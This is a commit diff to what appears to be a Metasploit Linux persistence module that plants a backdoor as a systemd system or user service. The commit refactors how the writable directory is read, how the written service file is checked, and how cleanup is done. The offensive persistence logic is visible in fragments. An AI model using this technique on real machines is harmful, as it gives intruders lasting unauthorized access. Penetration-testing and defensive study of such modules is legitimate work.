systemd updated with mixin udpates

h00die · h00die · commit e3cad5b77278 · 2025-09-09T16:19:41.000-04:00
diff --git a/modules/exploits/linux/persistence/init_systemd.rb b/modules/exploits/linux/persistence/init_systemd.rb
@@ -83,13 +83,13 @@ def initialize(info = {})
   end
 
   def check
-    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
     print_warning('User doesnt have root permissions, yet target set to systemd, likely need to change target to systemd user.') if target.name == 'systemd' && !is_root?
-    return CheckCode::Safe("#{datastore['WritableDir']} doesnt exist") unless exists?(datastore['WritableDir'])
-    return CheckCode::Safe("#{datastore['WritableDir']} isnt writable") unless writable?(datastore['WritableDir'])
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
     return CheckCode::Safe('Likely not a systemd based system') unless command_exists?('systemctl')
 
-    CheckCode::Appears("#{datastore['WritableDir']} is writable and system is systemd based")
+    CheckCode::Appears("#{writable_dir} is writable and system is systemd based")
   end
 
   def target_user
@@ -99,8 +99,8 @@ def target_user
   end
 
   def install_persistence
-    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
-    backdoor = write_shell(datastore['WritableDir'])
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    backdoor = write_shell(writable_dir)
 
     path = backdoor.split('/')[0...-1].join('/')
     file = backdoor.split('/')[-1]
@@ -158,7 +158,7 @@ def systemd(backdoor_path, backdoor_file)
     vprint_status("Writing service: #{service_name}")
     write_file(service_name, script)
 
-    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("/lib/systemd/system/#{service_filename}.service")
+    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)
 
     @clean_up_rc << "rm #{service_name}\n"
     if datastore['EnableService']
@@ -196,7 +196,8 @@ def systemd_user(backdoor_path, backdoor_file)
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")
       write_file(service_name, script)
-      fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("#{home}/.local/share/systemd/user/#{service_filename}.service")
+      fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)
+      @clean_up_rc << "rm #{service_name}\n"
     end
 
     # This was taken from pam_systemd(8)
